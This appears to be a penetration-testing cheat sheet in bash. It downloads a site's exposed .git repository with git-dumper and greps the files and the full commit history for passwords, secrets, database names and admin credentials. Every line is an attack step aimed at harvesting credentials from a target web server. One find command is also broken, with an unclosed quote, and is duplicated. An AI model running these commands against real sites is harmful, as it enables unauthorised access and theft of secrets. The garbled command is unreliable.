```bash # outputs contents of open Git repo to git_loot directory. pipx install git-dumper git-dumper http://domai.tld/.git git_loot cd git_loot git log # look for interesting files find . -type f \( -name '*config*' -o -name '*setting*' \) | grep -iE '\.ya?ml$|\.ini$|\.php$|\.json$|\.conf$|\.config$|\.txt find . -type f \( -name '*config*' -o -name '*setting*' \) | grep -iE '\.ya?ml$|\.ini$|\.php$|\.json$|\.conf$|\.config$|\.txt | xargs -I {} grep --color -PHair '^(?!(\s{0,}?//\s?|\s{0,}?\*\s{1,}?|\s{0,}?\#\s{1,}?)).*(root|admin|passw|database|db|sql|domain\.tld)' {} # emails and hostnames grep -Eair "domain.tld" # passwords grep -Eair "(secret|passwd|password)\ ?[=|:]\ ?['|\"]?\w{1,}['|\"]?" \ --exclude '*.css' --exclude '*.js' # Git Revision History git rev-list --all | xargs git -P grep --color -Eair "(secret|passwd|password)\ ?[=:]\ ?['|\"]?\w{1,}['|\"]?" | sort -u ```